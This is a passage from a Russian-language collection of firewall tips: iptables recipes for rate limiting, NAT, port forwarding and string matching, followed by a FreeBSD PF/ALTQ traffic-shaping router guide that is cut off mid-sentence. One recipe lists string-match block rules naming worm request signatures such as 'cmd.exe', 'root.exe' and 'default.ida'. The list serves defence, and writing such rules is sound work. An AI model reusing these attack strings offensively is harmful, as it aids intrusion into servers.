BankPorts:bank5.ru:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\n\ BankPorts:bank6.ru:21,22,23,24,25,26,27,28,29,210,211,212,213,214,215\n\ ClientBanks:192.168.9.0/16:smtp.mail.ru,pop.mail.ru,10.24.70.0/26\n\ ClientBanks:192.168.9.8:bank4.ru,bank5.ru,bank6.ru\n\ ClientBanks:192.168.9.6:bank6.ru,bank4.ru\n\ "|\ awk -v itls=$itls -F: '{ if($0~/^BankPorts/) BankPorts[$2]=$3 #создаем ассоциативный массив - индекс:банк, значение:порты через запятую if($0~/^ClientBanks/) ClientBanks[$2]=$3 #аналогично клиент -> банки }END{ #Cгенерируем _необходимые_ правила для цепочки CLIENTBANK for (client in ClientBanks){ split(ClientBanks[client],bank_arr,",") #поместили в массив bank_arr адреса банков для клиента for(i in bank_arr){ all_ports=all_ports","BankPorts[bank_arr[i]] #создаем список всех портов для дальнейшего использования count_ports=split(BankPorts[bank_arr[i]],tmp_arr,",") if(count_ports > 15) print "echo Слишком много портов для "bank_arr[i]".Допиши программу.Выход&&exit 1" else printf("%s -A CLIENTBANK -s %s -d %s -p tcp -m multiport --dports %s -j ACCEPT\n",itls,client,bank_arr[i],BankPorts[bank_arr[i]]) } } #Создадим правила перенаправляющие из FORWARD на обработку в CLIENTBANK, помня про ограничение в 15 портов sub(",","",all_ports) #отрезаем первую запятую у списка всех использующихся портов split(all_ports,all_ports_arr,",")#поместили в массив all_ports_arr все порты какие есть j=1;i=1 while(all_ports_arr[i]){ while(i<=(j*15)){ if (all_ports_arr[i]) tmp_all_ports=tmp_all_ports","all_ports_arr[i] i++ } sub(",","",tmp_all_ports) #отрезаем первую запятую printf("%s -I FORWARD -p tcp -m multiport --ports %s -j CLIENTBANK\n",itls,tmp_all_ports) tmp_all_ports="" j++ } print itls" -A CLIENTBANK -p tcp -m state --state ESTABLISHED -j ACCEPT" print itls" -N CLIENTBANK" print itls" -X CLIENTBANK" print itls" -F CLIENTBANK" #Удаляем из FORWARD все цепочки содержащие цель CLIENTBANK del_rules_nums="'`$itls --line-numbers -L FORWARD -n|grep CLIENTBANK|cut -f1 -d" "|tr "\n" ","`'" split(del_rules_nums,del_rules_arr,",") cnt_rules=1 while(del_rules_arr[cnt_rules]){ printf("%s -D FORWARD %s\n",itls,del_rules_arr[cnt_rules]) cnt_rules++ } }'|tac > gen.itls.sh chmod 700 gen.itls.sh echo "Команды сгенерированы в файл ./gen.itls.sh .Выход." exit ./gen.itls.sh rm ./gen.itls.sh

Лимитирование числа запросов в единицу времени через iptables (доп. ссылка 1) Автор: Steve [комментарии]

Разрешаем производить только 4 коннекта к 22 порту в течении 60 секунд: iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent \ --update --seconds 60 --hitcount 4 -j DROP

Ограничение трафика через iptables (доп. ссылка 1) Автор: Николай Малых [комментарии]

ipt_limit - общее ограничение по срабатываний правила -m limit --limit {avg}/[second|minute|hour|day] --limit-burst {burst} iplimit - ограничение соединений для одного IP. Ограничение коннектов к 80 порту от одного IP: iptables -A INPUT -p tcp --syn --dport http -m iplimit --iplimit-above 4 -j REJECT Тоже, но для запросов с одной /24 подсети: iptables -A INPUT -p tcp --syn --dport http -m iplimit --iplimit-mask 8 --iplimit-above 4 -j REJECT hashlimit - для каждого IP в хэше хранятся параметры соединений; -m hashlimit --hashlimit {avg} --hashlimit-burst {burst} --hashlimit-mode {режим: dstip, dstport, srcip, srcport} \ --hashlimit-name {name} --hashlimit-htable-max {num} --hashlimit-htable-expire {num} --hashlimit-htable-gcinterval {num} iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -m hashlimit --hashlimit 1/hour \ --hashlimit-burst 2 --hashlimit-mode srcip --hashlimit-name SSH --hashlimit-htable-expire 360000 -j ACCEPT tbf (http://www.nmalykh.org/work/tbf.tar.gz) - продолжение развития limit и hashlimit c поддержкой возможности инверсии правил в целом. iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -m tbf ! -- tbf 1/s --tbf-burst --tbf-mode srcip --tbf-name SMTP -j DROP

Примеры возможностей iptables открывающихся после установки POM (patch-o-matic) (доп. ссылка 1) [комментарии]

Фильтрация по строковой маске: iptables -A FORWARD -i eth0 -p tcp --sport 80 \ -m string --string '|7F|ELF' -j DROP iptables -A FORWARD -i eth0 -p tcp \ ! -s 192.168.0.5 --sport 80 -m string \ --string '|7F|ELF' -j DROP Сжатая компоновка номеров портов в одной строке: iptables -A INPUT -p tcp -m mport \ --dports 80,110,21,6000:6003 -j ACCEPT Учет времени при блокировке: iptables -A INPUT -p tcp -d 80 -m time \ --timestart 04:00 --timestop 06:30 --days Fri \ --syn -j REJECT Коннект в пустоту (соединение не закрывается, но ничего не происходит): iptables -A INPUT -p tcp -m tcp -dport 80 -j TARPIT Срабатывание правила с заданной вероятностью (в процентах): iptables -t nat -A PREROUTING -i eth0 -p tcp \ --dport 80 --syn -m random --average 33 \ -j DNAT --to-destination 192.168.0.100:80 iptables -t nat -A PREROUTING -i eth0 -p tcp \ --dport 80 --syn -m random --average 50 \ -j DNAT --to-destination 192.168.0.101:80 iptables -t nat -A PREROUTING -i eth0 -p tcp \ --dport 80 --syn -j DNAT \ --to-destination 192.168.0.102:80 См. также статью http://linuxgazette.net/108/odonovan.html

Как удалить iptables правило по номеру [комментарии]

iptables -L INPUT --line-numbers iptables -D INPUT номер iptables -t nat -L POSTROUTING --line-numbers iptables -t nat -D POSTROUTING номер

Как ограничить пропускную полосу для пакетов помеченных меткой через MARK. Автор: Denis Fedorishenko (NuclearCat) [комментарии]

Сделать MARK, и загнать все такие трансферы в какой-либо класс шейпера. Т.е. если например помеченные пакеты - все их отнести к классу 1:51 где скорость ограничена от 32К до 64К: tc filter add dev eth1 parent 1:0 protocol ip prio 100 handle 51 fw classid 1:51 tc class add dev eth1 parent 1:2 classid 1:51 htb rate 32Kbit ceil 64Kbit tc qdisc add dev eth1 parent 1:51 handle 51 sfq perturb 10

Как запретить пользователям качать большие файлы Автор: Denis Fedorishenko (NuclearCat) [обсудить]

- Собираем поддержку connbytes в patch-o-matic. - Добавляем правило в firewall, например: iptables -A FORWARD --connbytes 100000 -j REJECT - теперь все TCP сессии более 100 Кбайт будут "обрезаны", необходимо добавить исключения для протоколов типа ssh, обычные "долгоживущие" чаты и т.п.

Борьба с Kazaa и прочим вредным трафиком путем вырезания пакетов по маске Автор: Denis Fedorishenko (NuclearCat) [комментарии]

- собираем поддержку "string" в patch-o-matic. - смотрим на протокол Kazaa, в заголовках содержится: HTTP/1.0 503 Service Unavailable.Retry-After: 3..X-Kazaa-Username: BlazeTre - добавляем в firewall строчку - iptables -A FORWARD -m string --string "X-Kazaa-" -j REJECT

Как в Linux перебросить соединение через NAT во внутреннюю сеть (доп. ссылка 1) Автор: Dimez [комментарии]

Первый путь - пробрасывание только порта: 1) iptables -t nat -A PREROUTING -p tcp -d EXT_R_IP --dport 10000 -j DNAT --to-destination LOCAL_IP:80 2) iptables -A FORWARD -i eth0 -d LOCAL_IP -p tcp --dport 22 -j ACCEPT Второй вариант - выброс всей машины наружу (если есть свободные адреса): 1) ifconfig eth0:0 NEW_IP netmask NETMASK broadcast BROADCAST 2) route add NEW_IP gw GW netmask 0.0.0.0 metric 1 dev eth0:0 3) iptables -t nat -A PREROUTING -p tcp -d NEW_IP -j DNAT --to-destination LOCAL_IP 4) iptables -A FORWARD -i eth0 -d LOCAL_IP -j ACCEPT Обозначения: EXT_R_IP - внешний IP роутера, LOCAL_IP - внутренний IP машины, которую хочешь выбросить NEW_IP - новый IP на который хочешь посадить машину, которая имеет локальный LOCAL_IP NETMASK, BROADCAST, GW - внешние netmask, broadcast и gateway

Пример настройки NAT с привязкой к IP под Linux [комментарии]

Пример настройки NAT с привязкой к IP под Linux iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -d 0/0 -o eth0 -j SNAT --to-source 212.23.98.45 или (без привязки к IP) ipchains -A forward -j MASQ -s 192.168.0.0/16 -d 0.0.0.0/0 или (через iproute2) ip rule add from 10.0.1.0/24 nat 254.147.38.14 Другой способ трансляции адресов: iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -d 0/0 -j MASQUERADE

Как ограничить через iptables максимальное число одновременных соединений с одного IP. [комментарии]

# Максимум 10 одновременных соединений к 80 порту с одного IP iptables -A INPUT-p tcp --dport 80 -m iplimit --iplimit-above 10 -j REJECT # Блокируем на стадии SYN iptables -I INPUT -p tcp --syn --dport 80 -j DROP -m iplimit --iplimit-above 10 # 20 соединений на сеть класса С iptables -p tcp --dport 80 -m iplimit --iplimit-above 20 --iplimit-mask 24 -j REJECT

Как посмотреть статистику по PREROUTING цепочкам в iptables. [комментарии]

> Делаю: > iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.22.33:3128 > По iptables -L ничего не показывается. Используйте: iptables -t nat -L

Как настроить пакетный фильтр для фильтрации по содержимому пакетов [комментарии]

Следующие правила блокируют прохождение пакетов, данные в которых содержат подстроку virus.exe и ведут лог пакетов с строкой secret внутри: iptables -A INPUT -m string --string "secret" -j LOG --log-level info --log-prefix "SECRET" iptables -I INPUT -j DROP -p tcp -s 0.0.0.0/0 -m string --string "virus.exe" # Block Code Red iptables -I INPUT -j DROP -p tcp -m string --string "cmd.exe" # Block Nimda iptables -I INPUT -j DROP -p tcp -m string --string "root.exe" iptables -I INPUT -j DROP -p tcp -m string --string "default.ida"

Как настроить NAT (транслятор адресов) для нормальной работы с FTP и ICQ в Linux [комментарии]

iptables: modprobe iptable_nat modprobe ip_conntrack_ftp modprobe ip_nat_ftp modprobe ip_nat_irc ipchains: modprobe ip_masq_ftp modprobe ip_masq_raudio modprobe ip_masq_irc modprobe ip_masq_icq

Список интересных iptables модулей-расширений. (доп. ссылка 1) [обсудить]

Фильтрация по MAC (mac): --mac-source [!] XX:XX:XX:XX:XX:XX (! - "не" маска.) Запись номеров портов (multiport): --source-port [port[,port]] --destination-port [port[,port]] --port [port[,port]] (source или destination) Установка и проверка маркера пакет (mark): --set-mark mark --mark value Выборка пакетов посланных/полученных пользователем (owner): --uid-owner userid --gid-owner groupid --pid-owner processid Установка/проверка типа сервиса (TOS/tos): --set-tos tos --tos tos Определение log-level для syslog (LOG): --log-level level Установка реального IP для работы NAT (SNAT, цепочка POSTROUTING): --to-source <ipaddr>[-<ipaddr>][:port-port] Изменение/проверка TTL - time to live (TTL/ttl): --ttl-set ttl --ttl-dec N - уменьшение на N --ttl-inc N - увеличение на N --ttl ttl - проверка

Можно ли отфильтровывать пакеты (вести лог) в зависимости от UID пользователя ? [обсудить]

Для FreeBSD: ipfw add count tcp from any to not 192.168.1.0/24 uid 231 uid user (или gid group) - под правило попадают все TCP или UDP пакеты посланный или принятые пользователем user (группой group). В Linux в ядрах 2.4.x в iptables можно использовать модуль owner.

Ограничение трафика через iptables (доп. ссылка 1) Автор: Z0termaNN [комментарии]

iptables --new-chain car iptables --insert OUTPUT 1 -p tcp --destination-port 25 -o eth1 --jump car iptables --append car -m limit --limit 20/sec --jump RETURN iptables --append car --jump DROP

Пакетный фильтр в FreeBSD: ipfw, IP-Filter

Маршрутизатор на базе FreeBSD с приоритизация трафика средствами PF и ALTQ Автор: artemrts [комментарии]

Проблема приоритизации трафика, на мой взгляд, весьма актуальна. Интернет-канала много не бывает и на всех пользователей и сервисов локальной зачастую не хватает. Поэтому для нормальной работы Интернета требуется грамотное распределения полосы с учетом потребностей каждого из участников. Единственный раз, когда мне не понадобился QoS - это гарантированный провайдером канал в 20 Мбит/с в мир и 100Мбит/с - национальный. Но такое удовольствие не из дешевых, поэтому зачастую народ довольствуется ADSL-каналом с заявленной скоростью к клиенту до 5-10 Мбит/с. Хочу заметить, что данная статья не предназначенная для новичков в сетевом администрировании в целом и в PF в частности. Читателю необходимо иметь минимальные навыки работы с сетями (понимать устройство пакета, знать что такое ТСР-флаги и т.д.), а также с пакетным фильтром PF. Не лишним будет прочесть официальный FAQ и man'ы. В основном цель этой статьи поделиться опытом, выслушать замечания и, возможно, улучшить свой вариант. И так, постановка задачи: организовать доступ к сети Интернет. Грамотно распределить как входящий так и исходящий трафик с разделением канала для клиентов локальной сети и сервисов, запущенных на самом роутере (например, FTP-сервер, SIP-сервер и т.д.). В качестве роутера выступает сервер с ОС FreeBSD 9 c пакетным фильром PF. Протокол FTP будет использоваться только в пассивном режиме, что немного упростит конфигурацию. Для решения поставленной задачи необходимо пересобрать ядро и включить в него поддержку PF и ALTQ. Для задач, не требующих ALTQ, пересобирать ядро не обязательно. Можно просто подгрузить PF как модуль. Добавляем в файл конфигурации следующие строки и пересобираем ядро. Описывать каждую опцию не буду. В man 4 altq все есть. options HZ=1000 device pf device pflog options ALTQ options ALTQ_CBQ options ALTQ_RED options ALTQ_RIO options ALTQ_HFSC options ALTQ_CDNR options ALTQ_PRIQ #options ALTQ_NOPCC #for SMP CPU Лично я для боевого сервера пересобираю не только ядро системы, но и мир. Как это сделать, хорошо описано в Хендбуке и /usr/src/Makefile. Для автоматического запуска PF при старте системы добавляем в /etc/rc.conf строки: pf_enable="YES" pflog_enable="YES" Далее, собственно, сам конфигурационный файл пакетного фильтра. Возьмем самую простую реализацию роутера: один внутренний сетевой интерфейс и один внешний. Интернет канал подключен через ADSL-модем, работающий в режиме моста, т.е. подключение pppoe организовано средствами штатного ppp-клиента. Скорость от провайдера - 5 Мбит/c, к провайдеру - 850 Кбит/c. На роутере запущен HTTP-прокси для прозрачного перенаправления WWW-трафика пользователей сети. Это сделано с целью блокировать метод CONNECT и принудительно направить другие виды трафика (например, торрент) в другие очереди с другим приоритетом. Я использую легковесный, но "шустрый" 3proxy (3proxy.ru). Кому важен кэш - используйте Squid или Apache Traffic Server. Также перенаправляются все ДНС-запросы на сервер ДНС-провайдера. Это сделано с целью блокировки фишинговых и других зловредных сайтов, сайтов для взрослых, аплоадеры, соц. сети и т.д. и т.п. Некоторые компании так же предоставляет блокировку рекламных баннеров. Весь исходящий трафик я разбил на следующие очереди: - ДНС-запросы - очередь u_dns - ТСР АСК-пакеты - очередь u_ack - трафик с высоким приоритетом - очередь u_hipri - трафик с нормальным приоритетом - очередь u_pri - трафик с низким приоритетом - очередь u_lowpri - весь остальной трафик - очередь u_other - стандартная очередь - очередь u_std, одна очередь должна быть с опцией default, в которую попадает трафик, который не попадает ни под какое другое правило. В нашем случае это показатель правильности назначения очередей в правилах фильтрации. В эту очередь ничего не должно попадать. Аналогичное деление трафика, идущего к клиенту локальной сети, только вместо u_* используется d_* обозначение. Трафик классифицируется как относительно сервиса/протокола (HTTP, FTP, Torrent) так и относительно пользователя, т.е. трафик от/к компьютера, например, бухгалтера может быть весь помечен как с высоким приоритетом, независимо от того Торрент это или FTP. Данные, являющиеся ДНС-запросам и ТСР АСК-пакетами, для всех пользователей имеют свой высокий неизменный приоритет. Например, весь трафик от/к компьютера, относящегося к группе с низким приоритетом, будет обрабатываться с низким приоритетом, кроме ДНС и ТСР АСК. Определяем макросы, что бы меньше текста в основной части конфигурационного файла. mst="modulate state" str="source-track rule" ext_if="tun0" int_if="rl0" Таблица, в которую включены компьютеры трафик к/от которых весь будет считаться с высоким приоритетом. table <pc_hipri> persist {10.11.1.2} Аналогично для ПК с нормальным приоритетом. table <pc_pri> persist {10.13.1.2 10.13.1.10 10.13.1.13 10.13.1.14 10.13.1.15} Таблица с адресами, доступ к которым блокируется. table <ban> persist file "/etc/pf.ban" Таблица, с адресами клиентов, которым можно доверять. table <trust> persist {123.10.456.0/24 193.196.125.0/24} IP-адрес системного администратора. table <me> persist {210.211.13.84} IP-адреса SIP-провайдеров table <sip_peers> persist {212.15.65.122 75.16.127.118} Конфигурируем опции пакетного фильтра, изменяющие его поведение. В нашем случае: - не производится проверка на интерфейсе обратной петли; - выставляем оптимизацию правил в basic; - устанавливаем привязку состояний соединения (т.н. стейтов) к каждому интерфейсу; - устанавливаем максимальное кол-во состояний. Если сетевых интерфейсов большое кол-во или большое кол-во клиентов в сети, возможно, потребуется скорректировать это значение в большую сторону. set skip on lo0 set ruleset-optimization basic set state-policy if-bound set limit states 20000 Нормализация трафика (т.н. скрабинг). Срабинг позволяет значительно повысить безопасность файервола. В нашем случае выполняется нормализация трафика на внешнем интерфейсе, генерируется случайная последовательность в поле идентификации IP-пакета, устанавливается величина TTL=128, производится "дефрагментация" IP-пакетов, а также нормализация TCP соединений. scrub on $ext_if all random-id no-df min-ttl 128 fragment reassemble reassemble tcp ALTQ. Приоритизировать будем на всех физических сетевых интерфейсах. На внешнем - исходящий трафик, на внутреннем - входящий. Выбор дисциплины - очень важный момент. Возможные варианты: priq, cbq, hfsc. Я использую hfsc, т.к. важной чертой этого планировщика есть именно гарантирование полосы для конкретного пользователя/сервиса. Работа планировщика для нашего конкретного случая построена следующим образом: если в описании очереди указан дополнительный параметр realtime, то ей будет отдана указанная (realtime) полоса независимо ни от чего. Величина трафика свыше realtime будет рассчитываться исходя из величины bandwidth. Причем bandwidth - не абсолютный параметр, скорее относительный. Исходя из величин bandwidth каждой очереди рассчитывается величина трафика свыше realtime для каждой очереди пока не будет достигнут параметр upperlimit, который жестко ограничивает полосу. Приоритеты в планировщике hfsc не используются. Помимо всех прочих параметров, hfsc имеет параметр qlimit - кол-во слотов, доступных очереди для сохранения исходящих пакетов, когда вся доступная полоса исчерпана. И только когда все слоты будут заняты, пакеты будут отбрасываться, что заставит клиента снижать скорость. Мы не будем использовать RED или ECN, вместо этого увеличим значение qlimit. Назначаем очередь на внешнем интерфейсе. Величина bandwidth должна быть 96% от предоставляемой вышестоящим роутером. Здесь же перечисляем все дочерние очереди. altq on $ext_if hfsc bandwidth 800Kb queue {u_std,u_ack,u_dns,u_hipri,u_pri,u_lowpri,u_other} Очередь по-умолчанию. Будет потреблять 25 кбит/с независимо ни от чего. Величина bandwidth 1Kb означает, что если канал будет полностью занят любой другой очередью или всеми, то очередь u_std практически ничего не получит свыше 25 кбит/с. queue u_std bandwidth 1Kb qlimit 50 hfsc (default realtime 25Kb) Очередь u_ack - это ТСР АСК-пакеты, которые будут отправляться удаленному хосту с которого происходит загрузка по протоколу ТСР. Важно, что бы эти пакеты проходили без задержек. Для максимальной скорости от провайдеоа 4 Мбит/с требуется гарантированный канал в обратную сторону в размере 125 кбит/с. queue u_ack bandwidth 1Kb qlimit 200 hfsc (realtime 125Kb) ДНС-запросы. Гарантированной полосы в 25 кбит/с вполне достаточно. Больше не нужно, поэтому bandwidth 1Kb queue u_dns bandwidth 1Kb qlimit 50 hfsc (realtime 25Kb) Очередь с высоким приоритетом queue u_hipri bandwidth 300Kb qlimit 250 hfsc (realtime 200Kb) Очередь с обычным приоритетом queue u_pri bandwidth 300Kb qlimit 400 hfsc (realtime 150Kb) Очередь с низким приоритетом queue u_lowpri bandwidth 100Kb qlimit 100 hfsc (realtime 75Kb) Очередь для всего остального трафика ТСР и UDP. queue u_other bandwidth 97Kb qlimit 50 hfsc (realtime 25Kb) Назначаем очереди на внутреннем интерфейсе - приоритизируем входящий трафик. Провайдер отдает 5 Мбит/с, поэтому устанавливаем очередь inetq в размере 96%. Так же на внутреннем интерфейсе запущен ряд служб, например, локальный FTP, поэтому важно "не смешать" локальный трафик с Интернет-трафиком. Так как сетевая карточка 100Mbit, то выставляем значение bandwidth в 100Mb. Назначаем две очереди: одна - локальный трафик, вторая Интернет-трафик с дочерними очередями. altq on $int_if hfsc bandwidth 100Mb queue {etherq, inetq} Очередь для локального трафика. В эту очередь будут попадать все пакеты, идущие от внутреннего сетевого интерфейса к пользователям локальной сети. Параметр upperlimit определяет максимальное значения для данной очереди. Заметьте, в эту очередь не будут попадать ответы, например, от WWW-сервера из сети Интернет. Эта очередь исключительно для локального трафика. queue etherq bandwidth 95Mb hfsc (upperlimit 95Mb) Очередь для Интернет-трафика. В эту очередь будут попадать пакеты, идущие с сети Интернет. Имеет дочерние очереди по аналогии с внешним интерфейсом. queue inetq bandwidth 4800Kb hfsc (upperlimit 4800Kb) {d_std,d_ack,d_dns,d_hipri,d_pri,d_lowpri,d_other} queue d_std bandwidth 1Kb qlimit 50 hfsc (default realtime 25Kb) queue d_ack bandwidth 1Kb qlimit 50 hfsc (realtime 50Kb) queue d_dns bandwidth 1Kb qlimit 50 hfsc (realtime 25Kb) queue d_hipri bandwidth 1297Kb qlimit 500 hfsc (realtime 1000Kb) queue d_pri bandwidth 2000Kb qlimit 500 hfsc (realtime 2000Kb) queue d_lowpri bandwidth 1000Kb qlimit 500 hfsc (realtime 500Kb) queue d_other bandwidth 500Kb qlimit 500 hfsc (realtime 240Kb) Правила трансляции локальных адресов (NAT). Транслируются адреса, где источник - IP-адрес из любой подсети внутреннего интерфейса, а адрес назначения - любой, кроме IP-адресов из всех подсетей, подключенных к роутеру. Это могут быть как физические так и VPN-интерфейсы (tun, gif). ($ext_if) - в круглых скобках, т.к. IP-адрес внешнего интерфейса назначается динамически. ($int_if:network) и (self) в круглых скобках что бы в выводе pfctl -sn не было подстановки реальных адресов и сетей. Это удобно, когда у вас на внутреннем интерфейсе несколько алиасов и, соответственно, подсетей (как в моем случае). nat on $ext_if inet from ($int_if:network) to !(self) -> ($ext_if) port 1024:65535 Пользователей из группы pc_hipri и pc_pri пускаем в обход прокси. Я пускаю их напрямую, т.к. эти пользователи не нуждаются в контроле, а также специфическое ПО не работает в режиме прозрачного проксирования. no rdr on $int_if inet proto tcp from {<pc_hipri> <pc_pri>} to !(self) port 80 Правило редиректа, перенаправляющие все ДНС-запросы локальных пользователей на внешний ДНС-сервер. Это может быть Google или, лучше, ДНС-сервер компании, предоставляющей фильтрацию трафика посредством ДНС. rdr on $int_if inet proto {tcp udp} from ($int_if:network) to !(self) port 53 -> 193.58.251.251 port 53 Редирект на прокси-сервер. rdr on $int_if inet proto tcp from ($int_if:network) to !(self) port 80 -> 127.0.0.1 port 31280 Редирект на удаленный рабочий стол виндовой машины в локальной сети из сети Интернет. rdr on $ext_if inet proto tcp from any to ($ext_if) port 3389 -> 10.11.1.2 port 3389 Правила фильтрации трафика. Правила будем группировать в такой последовательности: действие, интерфейс, направление, протокол, адрес источника, порт источника, адрес назначения, порт назначения. Антиспуфинг. antispoof quick for {$int_if lo0} inet Блокируем не маршрутизируемые адреса. block in quick inet from no-route to any Блокируем броадкасты. block in quick on $ext_if inet from any to 255.255.255.255 Блокируем IP-адреса, содержащиеся в таблице ban. Опция return возвращает TCP RST, что закрывает сразу соединение без таймаута. Полезно, когда блокируются адреса рекламных сетей, что позволяет браузеру нормально загружать странички без ожидания загрузки блокируемого контента. block return out quick on $ext_if inet from any to <ban> Эти 2 правила определяют тип файервола: запрещено все, кроме явно разрешенного. block in all block out all Собственно разрешающие правила. Расположены в определенной последовательности, что важно с точки зрения производительности, а также ожидаемого эффекта. Внутренний интерфейс. Разрешаем ТСР-пакеты к интерфейсу обратной петли, на котором "слушает" прокси- сервер для организации прозрачного проксирования. Назначаем очереди. Мы не можем приоритизировать входящий трафик, только исходящий. В d_pri будут попадать пакеты, которые являются ответом от сервера к клиенту, таким образом мы регулируем скорость скачивания. pass in log quick on $int_if inet proto tcp from ($int_if:network) to 127.0.0.1 port 31280 queue (d_pri, d_ack) Далее 3 правила, которые разрешают ТСР соединения на определенные порты на не локальные IP-адреса. Назначаются соответствующие очереди. Тегирование необходимо что бы потом на внешнем интерфейсе мы могли "отделить" его от остального трафика и направить в нужную очередь. Заметьте, опция quick не используется, поэтому эти правила нужно расположить в правильной последовательности: от менее ограничивающего к более, потому как без опции quick последнее совпавшее правило выигрывает, а не первое совпавшее. Опция quick не используется т.к. при совпадении пакет будет назначен в очередь и пропущен и не дойдет до тех правил, которые описывают разрешения и приоритеты, основанные не на протоколах, а на адресах источника/назначения (в нашем случае это компьютеры из группы pc_hipri и pc_pri). Т.к. протокол ТСР, то так же добавляем очередь для ТСР АСК-пакетов. В качестве адреса назначения в правилах фигурирует !(self:network). Это значит, что только пакеты, не предназначенные ни к одному IP-адресу сетевых интерфейсов или IP-адресу из подсетей, подключенных к роутеру, будут разрешаться и, соответственно, тегироваться. Это, например, не даст подключиться к внешнему IP из локальной сети. pass in log on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ $mst queue (d_other d_ack) tag INET_OTHER pass in log on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port {20 21 25 110 143 5190 8080 081} $mst queue (d_lowpri d_ack) tag INET_LOWPRI pass in log on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port 443 $mst queue (d_pri d_ack) tag INET_PRI Далее 2 правила, которые будут срабатывать как для всех пользователей так и для тех, кто принадлежит к т.н. VIP-группе (pc_hipri и pc_pri). Поэтому тут используем опцию quick. pass in log quick on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port {22 3389} $mst queue (d_hipri d_ack) tag INET_HIPRI pass in log quick on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port 53 $mst queue (d_dns d_ack) tag INET_DNS Следующие 2 правила, по-аналогии с TCP, описывают разрешения и очереди для протокола UDP. Так же их тегируем. Второе правило с опцией quick, т.к. оно должно срабатывать для всех категорий пользователей. pass in log on $int_if inet proto udp from ($int_if:network) to !(self:network) queue d_other tag INET_OTHER pass in log quick on $int_if inet proto udp from ($int_if:network) to !(self:network) \\ port {53 123} queue d_dns tag INET_DNS Правило, разрешающее ICMP. pass in log on $int_if inet proto icmp from ($int_if:network) to !(self:network) queue d_lowpri tag INET_LOWPRI Следующие правила, разрешающие трафик от клиентов, с высоким и нормальным приоритетом. Весь трафик будет считаться очень высоким (hipri) или высоким (pri) приоритетом (кроме ДНС и ТСР АСК). Здесь мы не указываем протокол, но указываем modulate state, который применяется только для ТСР. Это не будет ошибкой, PF достаточно "умный" и он подставит modulate state для протокола ТСР, и keep state - для всех остальных протоколов. pass in log quick on $int_if inet from <pc_hipri> to !(self:network) $mst queue (d_hipri, d_ack) tag INET_HIPRI pass in log quick on $int_if inet from <pc_pri> to !(self:network) $mst queue (d_pri, d_ack) tag INET_PRI Разрешаем локальный Ethernet к внутреннему интерфейсу роутера. pass in quick on $int_if inet from ($int_if:network) to ($int_if) queue etherq Теперь опишем разрешающие правила с внутреннего интерфейса роутера в локальную сеть. Если у вас нет редиректа с Интернета в локальную сеть или нет никаких серверов/клиентов, запущенных на самом роутере и требующих доступ в локальную сеть, то эти правила можно не добавлять. Первое правило разрешает трафик с Интернета к указанному IP в локальной сети и назначает очень высокий приоритет входящего трафика. Это третье правило (первое - rdr, второе - разрешающее на внешнем интерфейсе) для редиректа (проброса) порта в локальную сеть. pass out quick on $int_if inet proto tcp from !(self) to 10.11.1.2 port 3389 queue (d_hipri d_ack) Правило, разрешающее трафик от внутреннего сетевого интерфейса роутера в локальную сеть. Не важно какой протокол. Весь направляется в очередь etherq. pass out quick on $int_if inet from ($int_if) to ($int_if:network) queue etherq Внешний интерфейс. Разрешающие правила для входящего трафика. Важно, для каждого входящего правило указывать максимальное кол-во стейтов, которые может создать правило. Это предотвратит исчерпывания всего лимита стейтов одним правилом в случае DoS атаки. Последующие 6 правил разрешают входящие ТСР-подключения к определенным портам роутера, а также назначаются соответствующие очереди. Эти очереди будут приоритизировать не входящий трафик, а исходящий. Так же стоит обратить внимание на первые два правила, которые разрешают доступ к FTP серверу на роутере. Передача команд по 21-му порту будет направляться в очередь с большим приоритетом (u_pri), а данные - с меньшим (u_lowpri). pass in quick on $ext_if inet proto tcp from <trust> to ($ext_if) port 21 $mst (max 100) queue (u_pri u_ack) pass in quick on $ext_if inet proto tcp from <trust> to ($ext_if) port >=49152 $mst (max 100) queue (u_lowpri u_ack) pass in quick on $ext_if inet proto tcp from <me> to ($ext_if) port 22 $mst (max 10) queue (u_hipri u_ack) pass in quick on $ext_if inet proto tcp from <me> to ($ext_if) port 80 $mst (max 100) queue (u_pri u_ack) pass in quick on $ext_if inet proto tcp from <me> to ($ext_if) port 5900 $mst (max 10) queue (u_hipri u_ack) Правило, разрешающее входящее подключение с сети Интернет (конкретно с адреса администратора), но не к интерфейсам роутера (внешнему в том числе), а к компьютеру в локальной сети к порту RDP. pass in quick on $ext_if inet proto tcp from <me> to !(self) port 3389 $mst (max 10) queue (u_hipri u_ack) Следующее правило разрешает подключение с любого адреса сети Интернет к VNC-репитеру. В целях безопасности включен трекинг источника (source-track). pass in quick on $ext_if inet proto tcp from any to ($ext_if) port 5500 $mst \\ (max 10,$str, max-src-nodes 2, max-src-states 3, max-src-conn-rate 3/60) \\ queue (u_hipri u_ack) Следующие 2 правила разрешают подключения к определенным портам по протоколу UDP. pass in quick on $ext_if inet proto udp from any to ($ext_if) port 1194 (max 20) queue u_pri pass in quick on $ext_if inet proto udp from <sip_peers> to ($ext_if) port 5060 (max 20) queue u_hipri Разрешаем пинг к внешнему интерфейсу. pass in quick on $ext_if inet proto icmp from any to ($ext_if) icmp-type echoreq (max 100) queue u_other Внешний интерфейс. Разрешающие правила для исходящего трафика. Следующие 5 правил разрешают исходящий трафик с внешнего интерфейса, который был помечен на внутреннем интерфейсе. Это исключительно данные, которые передаются в сеть Интернет от клиентов в локальной сети. pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_dns u_ack) tagged INET_DNS pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_hipri u_ack) tagged INET_HIPRI pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_pri u_ack) tagged INET_PRI pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_lowpri u_ack) tagged INET_LOWPRI pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_other u_ack) tagged INET_OTHER И последние правила, разрешающие исходящие соединения с внешнего интерфейса. Это будет трафик непосредственно самого роутера. В 